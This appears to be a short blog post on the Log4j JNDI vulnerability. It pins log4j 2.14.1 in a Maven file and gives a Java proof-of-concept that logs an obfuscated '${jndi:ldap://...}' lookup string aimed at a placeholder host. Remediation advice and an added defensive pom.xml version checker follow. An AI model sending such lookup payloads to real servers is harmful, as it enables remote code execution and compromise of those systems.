I actually fell asleep last night, feeling emo.
Create a new Maven project and import the following in pom.xml:

<dependencies>
    <!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core -->
    <dependency>
        <groupId>org.apache.logging.log4j</groupId>
        <artifactId>log4j-core</artifactId>
        <version>2.14.1</version>
    </dependency>
    <!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-api -->
    <dependency>
        <groupId>org.apache.logging.log4j</groupId>
        <artifactId>log4j-api</artifactId>
        <version>2.14.1</version>
    </dependency>
</dependencies>


import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class exploit {
    private static final Logger logger = LogManager.getLogger(exploit.class);

    public static void main(String[] args) {
        // This PoC string is encoded; decode with rot13 :)
        logger.error("%24%7Bwaqv:yqnc:%2F%2Fxxx:xxx%2Fuk.gkg%7D");
    }
}
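
Remediation
1. Use Huoxian Security's DongTai IAST to detect it --> DongTai-IAST
2. Check whether pom.xml contains a log4j version in the range 2.0 <= version <= 2.14.1
3. The official project has released a new version; affected users are advised to upgrade to the latest version promptly. Link: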
https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc1
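
One way to automate the pom.xml check from step 2, as an added example that is not part of the original post. The function names and the sample pom are constructed for illustration; the affected range is the one stated above, and the script also resolves versions declared through <properties>.

```python
import re
import xml.etree.ElementTree as ET

# Affected range as stated on this page: 2.0 <= version <= 2.14.1
LOW, HIGH = (2, 0, 0), (2, 14, 1)
GROUP = "org.apache.logging.log4j"

def _version_tuple(text):
    # "2.14.1" -> (2, 14, 1); "2.0-beta9" -> (2, 0, 0); unparsable -> None
    m = re.match(r"(\d+)(?:\.(\d+))?(?:\.(\d+))?", text.strip())
    return tuple(int(g or 0) for g in m.groups()) if m else None

def find_affected_log4j(pom_text):
    """Return [(artifactId, version)] for log4j 2.x dependencies in the
    affected range. Versions that cannot be resolved from this file are
    returned as "unresolved" so they get a manual review."""
    root = ET.fromstring(pom_text)
    # Real pom.xml files usually declare the Maven namespace; strip it so
    # plain tag names match whether or not it is present.
    for el in root.iter():
        el.tag = el.tag.rsplit("}", 1)[-1]
    props = {p.tag: (p.text or "") for p in root.findall("properties/*")}
    hits = []
    for dep in root.iter("dependency"):
        if dep.findtext("groupId", "").strip() != GROUP:
            continue
        artifact = dep.findtext("artifactId", "").strip()
        version = dep.findtext("version", "").strip()
        ref = re.fullmatch(r"\$\{(.+)\}", version)  # ${property} reference
        if ref:
            version = props.get(ref.group(1), "").strip()
        vt = _version_tuple(version)
        if vt is None:
            hits.append((artifact, "unresolved"))
        elif LOW <= vt <= HIGH:
            hits.append((artifact, version))
    return hits

# Constructed sample input (not a real project's pom.xml)
SAMPLE_POM = """<project xmlns="http://maven.apache.org/POM/4.0.0">
  <properties><log4j.version>2.14.1</log4j.version></properties>
  <dependencies>
    <dependency><groupId>org.apache.logging.log4j</groupId>
      <artifactId>log4j-core</artifactId><version>${log4j.version}</version></dependency>
    <dependency><groupId>org.apache.logging.log4j</groupId>
      <artifactId>log4j-api</artifactId><version>2.15.0</version></dependency>
  </dependencies>
</project>"""
```

A check of pom.xml alone does not see log4j pulled in transitively by other dependencies; `mvn dependency:tree` lists those.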